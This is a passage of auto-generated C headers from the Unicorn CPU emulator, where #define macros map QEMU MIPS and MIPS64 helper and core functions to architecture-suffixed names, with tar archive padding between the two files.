helper_msa_addv_h helper_msa_addv_h_mips #define helper_msa_addv_w helper_msa_addv_w_mips #define helper_msa_addv_d helper_msa_addv_d_mips #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mips #define helper_msa_ave_s_b helper_msa_ave_s_b_mips #define helper_msa_ave_s_h helper_msa_ave_s_h_mips #define helper_msa_ave_s_w helper_msa_ave_s_w_mips #define helper_msa_ave_s_d helper_msa_ave_s_d_mips #define helper_msa_ave_u_b helper_msa_ave_u_b_mips #define helper_msa_ave_u_h helper_msa_ave_u_h_mips #define helper_msa_ave_u_w helper_msa_ave_u_w_mips #define helper_msa_ave_u_d helper_msa_ave_u_d_mips #define helper_msa_aver_s_b helper_msa_aver_s_b_mips #define helper_msa_aver_s_h helper_msa_aver_s_h_mips #define helper_msa_aver_s_w helper_msa_aver_s_w_mips #define helper_msa_aver_s_d helper_msa_aver_s_d_mips #define helper_msa_aver_u_b helper_msa_aver_u_b_mips #define helper_msa_aver_u_h helper_msa_aver_u_h_mips #define helper_msa_aver_u_w helper_msa_aver_u_w_mips #define helper_msa_aver_u_d helper_msa_aver_u_d_mips #define helper_msa_ceq_b helper_msa_ceq_b_mips #define helper_msa_ceq_h helper_msa_ceq_h_mips #define helper_msa_ceq_w helper_msa_ceq_w_mips #define helper_msa_ceq_d helper_msa_ceq_d_mips #define helper_msa_cle_s_b helper_msa_cle_s_b_mips #define helper_msa_cle_s_h helper_msa_cle_s_h_mips #define helper_msa_cle_s_w helper_msa_cle_s_w_mips #define helper_msa_cle_s_d helper_msa_cle_s_d_mips #define helper_msa_cle_u_b helper_msa_cle_u_b_mips #define helper_msa_cle_u_h helper_msa_cle_u_h_mips #define helper_msa_cle_u_w helper_msa_cle_u_w_mips #define helper_msa_cle_u_d helper_msa_cle_u_d_mips #define helper_msa_clt_s_b helper_msa_clt_s_b_mips #define helper_msa_clt_s_h helper_msa_clt_s_h_mips #define helper_msa_clt_s_w helper_msa_clt_s_w_mips #define helper_msa_clt_s_d helper_msa_clt_s_d_mips #define helper_msa_clt_u_b helper_msa_clt_u_b_mips #define helper_msa_clt_u_h helper_msa_clt_u_h_mips #define helper_msa_clt_u_w helper_msa_clt_u_w_mips #define helper_msa_clt_u_d helper_msa_clt_u_d_mips #define helper_msa_div_s_b helper_msa_div_s_b_mips #define helper_msa_div_s_h helper_msa_div_s_h_mips #define helper_msa_div_s_w helper_msa_div_s_w_mips #define helper_msa_div_s_d helper_msa_div_s_d_mips #define helper_msa_div_u_b helper_msa_div_u_b_mips #define helper_msa_div_u_h helper_msa_div_u_h_mips #define helper_msa_div_u_w helper_msa_div_u_w_mips #define helper_msa_div_u_d helper_msa_div_u_d_mips #define helper_msa_max_a_b helper_msa_max_a_b_mips #define helper_msa_max_a_h helper_msa_max_a_h_mips #define helper_msa_max_a_w helper_msa_max_a_w_mips #define helper_msa_max_a_d helper_msa_max_a_d_mips #define helper_msa_max_s_b helper_msa_max_s_b_mips #define helper_msa_max_s_h helper_msa_max_s_h_mips #define helper_msa_max_s_w helper_msa_max_s_w_mips #define helper_msa_max_s_d helper_msa_max_s_d_mips #define helper_msa_max_u_b helper_msa_max_u_b_mips #define helper_msa_max_u_h helper_msa_max_u_h_mips #define helper_msa_max_u_w helper_msa_max_u_w_mips #define helper_msa_max_u_d helper_msa_max_u_d_mips #define helper_msa_min_a_b helper_msa_min_a_b_mips #define helper_msa_min_a_h helper_msa_min_a_h_mips #define helper_msa_min_a_w helper_msa_min_a_w_mips #define helper_msa_min_a_d helper_msa_min_a_d_mips #define helper_msa_min_s_b helper_msa_min_s_b_mips #define helper_msa_min_s_h helper_msa_min_s_h_mips #define helper_msa_min_s_w helper_msa_min_s_w_mips #define helper_msa_min_s_d helper_msa_min_s_d_mips #define helper_msa_min_u_b helper_msa_min_u_b_mips #define helper_msa_min_u_h helper_msa_min_u_h_mips #define helper_msa_min_u_w helper_msa_min_u_w_mips #define helper_msa_min_u_d helper_msa_min_u_d_mips #define helper_msa_mod_s_b helper_msa_mod_s_b_mips #define helper_msa_mod_s_h helper_msa_mod_s_h_mips #define helper_msa_mod_s_w helper_msa_mod_s_w_mips #define helper_msa_mod_s_d helper_msa_mod_s_d_mips #define helper_msa_mod_u_b helper_msa_mod_u_b_mips #define helper_msa_mod_u_h helper_msa_mod_u_h_mips #define helper_msa_mod_u_w helper_msa_mod_u_w_mips #define helper_msa_mod_u_d helper_msa_mod_u_d_mips #define helper_msa_asub_s_b helper_msa_asub_s_b_mips #define helper_msa_asub_s_h helper_msa_asub_s_h_mips #define helper_msa_asub_s_w helper_msa_asub_s_w_mips #define helper_msa_asub_s_d helper_msa_asub_s_d_mips #define helper_msa_asub_u_b helper_msa_asub_u_b_mips #define helper_msa_asub_u_h helper_msa_asub_u_h_mips #define helper_msa_asub_u_w helper_msa_asub_u_w_mips #define helper_msa_asub_u_d helper_msa_asub_u_d_mips #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips #define helper_msa_ilvev_b helper_msa_ilvev_b_mips #define helper_msa_ilvev_h helper_msa_ilvev_h_mips #define helper_msa_ilvev_w helper_msa_ilvev_w_mips #define helper_msa_ilvev_d helper_msa_ilvev_d_mips #define helper_msa_ilvod_b helper_msa_ilvod_b_mips #define helper_msa_ilvod_h helper_msa_ilvod_h_mips #define helper_msa_ilvod_w helper_msa_ilvod_w_mips #define helper_msa_ilvod_d helper_msa_ilvod_d_mips #define helper_msa_ilvl_b helper_msa_ilvl_b_mips #define helper_msa_ilvl_h helper_msa_ilvl_h_mips #define helper_msa_ilvl_w helper_msa_ilvl_w_mips #define helper_msa_ilvl_d helper_msa_ilvl_d_mips #define helper_msa_ilvr_b helper_msa_ilvr_b_mips #define helper_msa_ilvr_h helper_msa_ilvr_h_mips #define helper_msa_ilvr_w helper_msa_ilvr_w_mips #define helper_msa_ilvr_d helper_msa_ilvr_d_mips #define helper_msa_and_v helper_msa_and_v_mips #define helper_msa_nor_v helper_msa_nor_v_mips #define helper_msa_or_v helper_msa_or_v_mips #define helper_msa_xor_v helper_msa_xor_v_mips #define helper_msa_move_v helper_msa_move_v_mips #define helper_msa_pckev_b helper_msa_pckev_b_mips #define helper_msa_pckev_h helper_msa_pckev_h_mips #define helper_msa_pckev_w helper_msa_pckev_w_mips #define helper_msa_pckev_d helper_msa_pckev_d_mips #define helper_msa_pckod_b helper_msa_pckod_b_mips #define helper_msa_pckod_h helper_msa_pckod_h_mips #define helper_msa_pckod_w helper_msa_pckod_w_mips #define helper_msa_pckod_d helper_msa_pckod_d_mips #define helper_msa_sll_b helper_msa_sll_b_mips #define helper_msa_sll_h helper_msa_sll_h_mips #define helper_msa_sll_w helper_msa_sll_w_mips #define helper_msa_sll_d helper_msa_sll_d_mips #define helper_msa_sra_b helper_msa_sra_b_mips #define helper_msa_sra_h helper_msa_sra_h_mips #define helper_msa_sra_w helper_msa_sra_w_mips #define helper_msa_sra_d helper_msa_sra_d_mips #define helper_msa_srar_b helper_msa_srar_b_mips #define helper_msa_srar_h helper_msa_srar_h_mips #define helper_msa_srar_w helper_msa_srar_w_mips #define helper_msa_srar_d helper_msa_srar_d_mips #define helper_msa_srl_b helper_msa_srl_b_mips #define helper_msa_srl_h helper_msa_srl_h_mips #define helper_msa_srl_w helper_msa_srl_w_mips #define helper_msa_srl_d helper_msa_srl_d_mips #define helper_msa_srlr_b helper_msa_srlr_b_mips #define helper_msa_srlr_h helper_msa_srlr_h_mips #define helper_msa_srlr_w helper_msa_srlr_w_mips #define helper_msa_srlr_d helper_msa_srlr_d_mips #define helper_msa_andi_b helper_msa_andi_b_mips #define helper_msa_ori_b helper_msa_ori_b_mips #define helper_msa_nori_b helper_msa_nori_b_mips #define helper_msa_xori_b helper_msa_xori_b_mips #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips #define helper_msa_bmzi_b helper_msa_bmzi_b_mips #define helper_msa_bseli_b helper_msa_bseli_b_mips #define helper_msa_shf_df helper_msa_shf_df_mips #define helper_msa_addvi_df helper_msa_addvi_df_mips #define helper_msa_subvi_df helper_msa_subvi_df_mips #define helper_msa_ceqi_df helper_msa_ceqi_df_mips #define helper_msa_clei_s_df helper_msa_clei_s_df_mips #define helper_msa_clei_u_df helper_msa_clei_u_df_mips #define helper_msa_clti_s_df helper_msa_clti_s_df_mips #define helper_msa_clti_u_df helper_msa_clti_u_df_mips #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips #define helper_msa_mini_s_df helper_msa_mini_s_df_mips #define helper_msa_mini_u_df helper_msa_mini_u_df_mips #define helper_msa_ldi_df helper_msa_ldi_df_mips #define helper_msa_slli_df helper_msa_slli_df_mips #define helper_msa_srai_df helper_msa_srai_df_mips #define helper_msa_srli_df helper_msa_srli_df_mips #define helper_msa_bclri_df helper_msa_bclri_df_mips #define helper_msa_bseti_df helper_msa_bseti_df_mips #define helper_msa_bnegi_df helper_msa_bnegi_df_mips #define helper_msa_sat_s_df helper_msa_sat_s_df_mips #define helper_msa_sat_u_df helper_msa_sat_u_df_mips #define helper_msa_srari_df helper_msa_srari_df_mips #define helper_msa_srlri_df helper_msa_srlri_df_mips #define helper_msa_binsli_df helper_msa_binsli_df_mips #define helper_msa_binsri_df helper_msa_binsri_df_mips #define helper_msa_subv_df helper_msa_subv_df_mips #define helper_msa_subs_s_df helper_msa_subs_s_df_mips #define helper_msa_subs_u_df helper_msa_subs_u_df_mips #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips #define helper_msa_mulv_df helper_msa_mulv_df_mips #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips #define helper_msa_mul_q_df helper_msa_mul_q_df_mips #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips #define helper_msa_sld_df helper_msa_sld_df_mips #define helper_msa_maddv_df helper_msa_maddv_df_mips #define helper_msa_msubv_df helper_msa_msubv_df_mips #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips #define helper_msa_binsl_df helper_msa_binsl_df_mips #define helper_msa_binsr_df helper_msa_binsr_df_mips #define helper_msa_madd_q_df helper_msa_madd_q_df_mips #define helper_msa_msub_q_df helper_msa_msub_q_df_mips #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips #define helper_msa_splat_df helper_msa_splat_df_mips #define helper_msa_vshf_df helper_msa_vshf_df_mips #define helper_msa_sldi_df helper_msa_sldi_df_mips #define helper_msa_splati_df helper_msa_splati_df_mips #define helper_msa_copy_s_b helper_msa_copy_s_b_mips #define helper_msa_copy_s_h helper_msa_copy_s_h_mips #define helper_msa_copy_s_w helper_msa_copy_s_w_mips #define helper_msa_copy_s_d helper_msa_copy_s_d_mips #define helper_msa_copy_u_b helper_msa_copy_u_b_mips #define helper_msa_copy_u_h helper_msa_copy_u_h_mips #define helper_msa_copy_u_w helper_msa_copy_u_w_mips #define helper_msa_insert_b helper_msa_insert_b_mips #define helper_msa_insert_h helper_msa_insert_h_mips #define helper_msa_insert_w helper_msa_insert_w_mips #define helper_msa_insert_d helper_msa_insert_d_mips #define helper_msa_insve_df helper_msa_insve_df_mips #define helper_msa_ctcmsa helper_msa_ctcmsa_mips #define helper_msa_cfcmsa helper_msa_cfcmsa_mips #define helper_msa_fill_df helper_msa_fill_df_mips #define helper_msa_fcaf_df helper_msa_fcaf_df_mips #define helper_msa_fcun_df helper_msa_fcun_df_mips #define helper_msa_fceq_df helper_msa_fceq_df_mips #define helper_msa_fcueq_df helper_msa_fcueq_df_mips #define helper_msa_fclt_df helper_msa_fclt_df_mips #define helper_msa_fcult_df helper_msa_fcult_df_mips #define helper_msa_fcle_df helper_msa_fcle_df_mips #define helper_msa_fcule_df helper_msa_fcule_df_mips #define helper_msa_fsaf_df helper_msa_fsaf_df_mips #define helper_msa_fsun_df helper_msa_fsun_df_mips #define helper_msa_fseq_df helper_msa_fseq_df_mips #define helper_msa_fsueq_df helper_msa_fsueq_df_mips #define helper_msa_fslt_df helper_msa_fslt_df_mips #define helper_msa_fsult_df helper_msa_fsult_df_mips #define helper_msa_fsle_df helper_msa_fsle_df_mips #define helper_msa_fsule_df helper_msa_fsule_df_mips #define helper_msa_fcor_df helper_msa_fcor_df_mips #define helper_msa_fcune_df helper_msa_fcune_df_mips #define helper_msa_fcne_df helper_msa_fcne_df_mips #define helper_msa_fsor_df helper_msa_fsor_df_mips #define helper_msa_fsune_df helper_msa_fsune_df_mips #define helper_msa_fsne_df helper_msa_fsne_df_mips #define helper_msa_fadd_df helper_msa_fadd_df_mips #define helper_msa_fsub_df helper_msa_fsub_df_mips #define helper_msa_fmul_df helper_msa_fmul_df_mips #define helper_msa_fdiv_df helper_msa_fdiv_df_mips #define helper_msa_fmadd_df helper_msa_fmadd_df_mips #define helper_msa_fmsub_df helper_msa_fmsub_df_mips #define helper_msa_fexp2_df helper_msa_fexp2_df_mips #define helper_msa_fexdo_df helper_msa_fexdo_df_mips #define helper_msa_ftq_df helper_msa_ftq_df_mips #define helper_msa_fmin_df helper_msa_fmin_df_mips #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips #define helper_msa_fmax_df helper_msa_fmax_df_mips #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips #define helper_msa_fclass_df helper_msa_fclass_df_mips #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips #define helper_msa_frcp_df helper_msa_frcp_df_mips #define helper_msa_frint_df helper_msa_frint_df_mips #define helper_msa_flog2_df helper_msa_flog2_df_mips #define helper_msa_fexupl_df helper_msa_fexupl_df_mips #define helper_msa_fexupr_df helper_msa_fexupr_df_mips #define helper_msa_ffql_df helper_msa_ffql_df_mips #define helper_msa_ffqr_df helper_msa_ffqr_df_mips #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips #define helper_raise_exception_err helper_raise_exception_err_mips #define helper_raise_exception helper_raise_exception_mips #define helper_raise_exception_debug helper_raise_exception_debug_mips #define helper_muls helper_muls_mips #define helper_mulsu helper_mulsu_mips #define helper_macc helper_macc_mips #define helper_macchi helper_macchi_mips #define helper_maccu helper_maccu_mips #define helper_macchiu helper_macchiu_mips #define helper_msac helper_msac_mips #define helper_msachi helper_msachi_mips #define helper_msacu helper_msacu_mips #define helper_msachiu helper_msachiu_mips #define helper_mulhi helper_mulhi_mips #define helper_mulhiu helper_mulhiu_mips #define helper_mulshi helper_mulshi_mips #define helper_mulshiu helper_mulshiu_mips #define helper_dbitswap helper_dbitswap_mips #define helper_bitswap helper_bitswap_mips #define helper_rotx helper_rotx_mips #define helper_ll helper_ll_mips #define helper_lld helper_lld_mips #define helper_swl helper_swl_mips #define helper_swr helper_swr_mips #define helper_sdl helper_sdl_mips #define helper_sdr helper_sdr_mips #define helper_lwm helper_lwm_mips #define helper_swm helper_swm_mips #define helper_ldm helper_ldm_mips #define helper_sdm helper_sdm_mips #define helper_fork helper_fork_mips #define helper_yield helper_yield_mips #define r4k_helper_tlbinv r4k_helper_tlbinv_mips #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips #define r4k_helper_tlbwi r4k_helper_tlbwi_mips #define r4k_helper_tlbwr r4k_helper_tlbwr_mips #define r4k_helper_tlbp r4k_helper_tlbp_mips #define r4k_helper_tlbr r4k_helper_tlbr_mips #define helper_tlbwi helper_tlbwi_mips #define helper_tlbwr helper_tlbwr_mips #define helper_tlbp helper_tlbp_mips #define helper_tlbr helper_tlbr_mips #define helper_tlbinv helper_tlbinv_mips #define helper_tlbinvf helper_tlbinvf_mips #define helper_ginvt helper_ginvt_mips #define helper_di helper_di_mips #define helper_ei helper_ei_mips #define helper_eret helper_eret_mips #define helper_eretnc helper_eretnc_mips #define helper_deret helper_deret_mips #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips #define helper_rdhwr_cc helper_rdhwr_cc_mips #define helper_rdhwr_ccres helper_rdhwr_ccres_mips #define helper_rdhwr_performance helper_rdhwr_performance_mips #define helper_rdhwr_xnp helper_rdhwr_xnp_mips #define helper_pmon helper_pmon_mips #define helper_wait helper_wait_mips #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips #define helper_msa_ld_b helper_msa_ld_b_mips #define helper_msa_ld_h helper_msa_ld_h_mips #define helper_msa_ld_w helper_msa_ld_w_mips #define helper_msa_ld_d helper_msa_ld_d_mips #define helper_msa_st_b helper_msa_st_b_mips #define helper_msa_st_h helper_msa_st_h_mips #define helper_msa_st_w helper_msa_st_w_mips #define helper_msa_st_d helper_msa_st_d_mips #define helper_cache helper_cache_mips #define gen_intermediate_code gen_intermediate_code_mips #define mips_tcg_init mips_tcg_init_mips #define cpu_mips_realize_env cpu_mips_realize_env_mips #define cpu_state_reset cpu_state_reset_mips #define restore_state_to_opc restore_state_to_opc_mips #define ieee_rm ieee_rm_mips #define mips_defs mips_defs_mips #define mips_defs_number mips_defs_number_mips #define gen_helper_float_class_s gen_helper_float_class_s_mips #define gen_helper_float_class_d gen_helper_float_class_d_mips #endif ���������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/mips64.h�������������������������������������������������������������������������0000664�0000000�0000000�00000402103�14675241067�0015446�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_mips64_H #define UNICORN_AUTOGEN_mips64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mips64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_mips64 #define reg_read reg_read_mips64 #define reg_write reg_write_mips64 #define uc_init uc_init_mips64 #define uc_add_inline_hook uc_add_inline_hook_mips64 #define uc_del_inline_hook uc_del_inline_hook_mips64 #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 #define use_idiv_instructions use_idiv_instructions_mips64 #define arm_arch arm_arch_mips64 #define tb_target_set_jmp_target tb_target_set_jmp_target_mips64 #define have_bmi1 have_bmi1_mips64 #define have_popcnt have_popcnt_mips64 #define have_avx1 have_avx1_mips64 #define have_avx2 have_avx2_mips64 #define have_isa have_isa_mips64 #define have_altivec have_altivec_mips64 #define have_vsx have_vsx_mips64 #define flush_icache_range flush_icache_range_mips64 #define s390_facilities s390_facilities_mips64 #define tcg_dump_op tcg_dump_op_mips64 #define tcg_dump_ops tcg_dump_ops_mips64 #define tcg_gen_and_i64 tcg_gen_and_i64_mips64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips64 #define tcg_gen_or_i64 tcg_gen_or_i64_mips64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64 #define tcg_gen_st_i64 tcg_gen_st_i64_mips64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64 #define cpu_icount_to_ns cpu_icount_to_ns_mips64 #define cpu_is_stopped cpu_is_stopped_mips64 #define cpu_get_ticks cpu_get_ticks_mips64 #define cpu_get_clock cpu_get_clock_mips64 #define cpu_resume cpu_resume_mips64 #define qemu_init_vcpu qemu_init_vcpu_mips64 #define cpu_stop_current cpu_stop_current_mips64 #define resume_all_vcpus resume_all_vcpus_mips64 #define vm_start vm_start_mips64 #define address_space_dispatch_compact address_space_dispatch_compact_mips64 #define flatview_translate flatview_translate_mips64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64 #define qemu_get_cpu qemu_get_cpu_mips64 #define cpu_address_space_init cpu_address_space_init_mips64 #define cpu_get_address_space cpu_get_address_space_mips64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips64 #define cpu_exec_initfn cpu_exec_initfn_mips64 #define cpu_exec_realizefn cpu_exec_realizefn_mips64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64 #define cpu_watchpoint_insert cpu_watchpoint_insert_mips64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64 #define cpu_breakpoint_insert cpu_breakpoint_insert_mips64 #define cpu_breakpoint_remove cpu_breakpoint_remove_mips64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64 #define cpu_abort cpu_abort_mips64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64 #define flatview_add_to_dispatch flatview_add_to_dispatch_mips64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips64 #define qemu_ram_get_offset qemu_ram_get_offset_mips64 #define qemu_ram_get_used_length qemu_ram_get_used_length_mips64 #define qemu_ram_is_shared qemu_ram_is_shared_mips64 #define qemu_ram_pagesize qemu_ram_pagesize_mips64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64 #define qemu_ram_alloc qemu_ram_alloc_mips64 #define qemu_ram_free qemu_ram_free_mips64 #define qemu_map_ram_ptr qemu_map_ram_ptr_mips64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mips64 #define qemu_ram_block_from_host qemu_ram_block_from_host_mips64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64 #define cpu_check_watchpoint cpu_check_watchpoint_mips64 #define iotlb_to_section iotlb_to_section_mips64 #define address_space_dispatch_new address_space_dispatch_new_mips64 #define address_space_dispatch_free address_space_dispatch_free_mips64 #define flatview_read_continue flatview_read_continue_mips64 #define address_space_read_full address_space_read_full_mips64 #define address_space_write address_space_write_mips64 #define address_space_rw address_space_rw_mips64 #define cpu_physical_memory_rw cpu_physical_memory_rw_mips64 #define address_space_write_rom address_space_write_rom_mips64 #define cpu_flush_icache_range cpu_flush_icache_range_mips64 #define cpu_exec_init_all cpu_exec_init_all_mips64 #define address_space_access_valid address_space_access_valid_mips64 #define address_space_map address_space_map_mips64 #define address_space_unmap address_space_unmap_mips64 #define cpu_physical_memory_map cpu_physical_memory_map_mips64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64 #define cpu_memory_rw_debug cpu_memory_rw_debug_mips64 #define qemu_target_page_size qemu_target_page_size_mips64 #define qemu_target_page_bits qemu_target_page_bits_mips64 #define qemu_target_page_bits_min qemu_target_page_bits_min_mips64 #define target_words_bigendian target_words_bigendian_mips64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64 #define ram_block_discard_range ram_block_discard_range_mips64 #define ramblock_is_pmem ramblock_is_pmem_mips64 #define page_size_init page_size_init_mips64 #define set_preferred_target_page_bits set_preferred_target_page_bits_mips64 #define finalize_target_page_bits finalize_target_page_bits_mips64 #define cpu_outb cpu_outb_mips64 #define cpu_outw cpu_outw_mips64 #define cpu_outl cpu_outl_mips64 #define cpu_inb cpu_inb_mips64 #define cpu_inw cpu_inw_mips64 #define cpu_inl cpu_inl_mips64 #define memory_map memory_map_mips64 #define memory_map_io memory_map_io_mips64 #define memory_map_ptr memory_map_ptr_mips64 #define memory_cow memory_cow_mips64 #define memory_unmap memory_unmap_mips64 #define memory_moveout memory_moveout_mips64 #define memory_movein memory_movein_mips64 #define memory_free memory_free_mips64 #define flatview_unref flatview_unref_mips64 #define address_space_get_flatview address_space_get_flatview_mips64 #define memory_region_transaction_begin memory_region_transaction_begin_mips64 #define memory_region_transaction_commit memory_region_transaction_commit_mips64 #define memory_region_init memory_region_init_mips64 #define memory_region_access_valid memory_region_access_valid_mips64 #define memory_region_dispatch_read memory_region_dispatch_read_mips64 #define memory_region_dispatch_write memory_region_dispatch_write_mips64 #define memory_region_init_io memory_region_init_io_mips64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64 #define memory_region_size memory_region_size_mips64 #define memory_region_set_readonly memory_region_set_readonly_mips64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64 #define memory_region_from_host memory_region_from_host_mips64 #define memory_region_get_ram_addr memory_region_get_ram_addr_mips64 #define memory_region_add_subregion memory_region_add_subregion_mips64 #define memory_region_del_subregion memory_region_del_subregion_mips64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64 #define memory_region_find memory_region_find_mips64 #define memory_region_filter_subregions memory_region_filter_subregions_mips64 #define memory_listener_register memory_listener_register_mips64 #define memory_listener_unregister memory_listener_unregister_mips64 #define address_space_remove_listeners address_space_remove_listeners_mips64 #define address_space_init address_space_init_mips64 #define address_space_destroy address_space_destroy_mips64 #define memory_region_init_ram memory_region_init_ram_mips64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64 #define find_memory_mapping find_memory_mapping_mips64 #define exec_inline_op exec_inline_op_mips64 #define floatx80_default_nan floatx80_default_nan_mips64 #define float_raise float_raise_mips64 #define float16_is_quiet_nan float16_is_quiet_nan_mips64 #define float16_is_signaling_nan float16_is_signaling_nan_mips64 #define float32_is_quiet_nan float32_is_quiet_nan_mips64 #define float32_is_signaling_nan float32_is_signaling_nan_mips64 #define float64_is_quiet_nan float64_is_quiet_nan_mips64 #define float64_is_signaling_nan float64_is_signaling_nan_mips64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64 #define floatx80_silence_nan floatx80_silence_nan_mips64 #define propagateFloatx80NaN propagateFloatx80NaN_mips64 #define float128_is_quiet_nan float128_is_quiet_nan_mips64 #define float128_is_signaling_nan float128_is_signaling_nan_mips64 #define float128_silence_nan float128_silence_nan_mips64 #define float16_add float16_add_mips64 #define float16_sub float16_sub_mips64 #define float32_add float32_add_mips64 #define float32_sub float32_sub_mips64 #define float64_add float64_add_mips64 #define float64_sub float64_sub_mips64 #define float16_mul float16_mul_mips64 #define float32_mul float32_mul_mips64 #define float64_mul float64_mul_mips64 #define float16_muladd float16_muladd_mips64 #define float32_muladd float32_muladd_mips64 #define float64_muladd float64_muladd_mips64 #define float16_div float16_div_mips64 #define float32_div float32_div_mips64 #define float64_div float64_div_mips64 #define float16_to_float32 float16_to_float32_mips64 #define float16_to_float64 float16_to_float64_mips64 #define float32_to_float16 float32_to_float16_mips64 #define float32_to_float64 float32_to_float64_mips64 #define float64_to_float16 float64_to_float16_mips64 #define float64_to_float32 float64_to_float32_mips64 #define float16_round_to_int float16_round_to_int_mips64 #define float32_round_to_int float32_round_to_int_mips64 #define float64_round_to_int float64_round_to_int_mips64 #define float16_to_int16_scalbn float16_to_int16_scalbn_mips64 #define float16_to_int32_scalbn float16_to_int32_scalbn_mips64 #define float16_to_int64_scalbn float16_to_int64_scalbn_mips64 #define float32_to_int16_scalbn float32_to_int16_scalbn_mips64 #define float32_to_int32_scalbn float32_to_int32_scalbn_mips64 #define float32_to_int64_scalbn float32_to_int64_scalbn_mips64 #define float64_to_int16_scalbn float64_to_int16_scalbn_mips64 #define float64_to_int32_scalbn float64_to_int32_scalbn_mips64 #define float64_to_int64_scalbn float64_to_int64_scalbn_mips64 #define float16_to_int16 float16_to_int16_mips64 #define float16_to_int32 float16_to_int32_mips64 #define float16_to_int64 float16_to_int64_mips64 #define float32_to_int16 float32_to_int16_mips64 #define float32_to_int32 float32_to_int32_mips64 #define float32_to_int64 float32_to_int64_mips64 #define float64_to_int16 float64_to_int16_mips64 #define float64_to_int32 float64_to_int32_mips64 #define float64_to_int64 float64_to_int64_mips64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips64 #define 